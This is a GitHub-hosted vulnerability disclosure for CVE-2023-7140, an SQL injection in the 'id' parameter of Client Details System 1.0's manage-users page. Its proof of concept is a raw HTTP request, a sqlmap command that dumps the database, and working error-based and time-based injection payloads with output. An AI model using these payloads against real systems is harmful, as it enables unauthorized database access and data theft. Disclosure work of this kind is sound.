Skip to content

Latest commit

 

History

History
66 lines (58 loc) · 3 KB

Client_Details_System-SQL_Injection_4.md

File metadata and controls

66 lines (58 loc) · 3 KB
Raw

CVE-2023-7140_Client_Details_System-SQL_Injection_4

References:

Description:

Client Details System 1.0 allows SQL Injection via parameter 'id' in "/clientdetails/admin/manage-users.php?id=1". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.

Proof of Concept:

GET /clientdetails/admin/manage-users.php?id=1 HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=p5mgq2eci66sik6s94eakcjub9
Referer: http://localhost/clientdetails/admin/manage-users.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
  • Use sqlmap to exploit. In sqlmap, use 'id' parameter to dump the database.
python sqlmap.py -r r.txt -p id --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db

---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: id=1' AND EXTRACTVALUE(3346,CONCAT(0x5c,0x716b6a7a71,(SELECT (ELT(3346=3346,1))),0x7171707171))-- gsCH

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9169 FROM (SELECT(SLEEP(5)))gCdu)-- FiYL
---
[17:48:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.1.6, Apache 2.4.53
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[17:48:57] [INFO] fetching current database
[17:48:57] [INFO] retrieved: 'loginsystem'
current database: 'loginsystem'
  • current database: loginsystem 4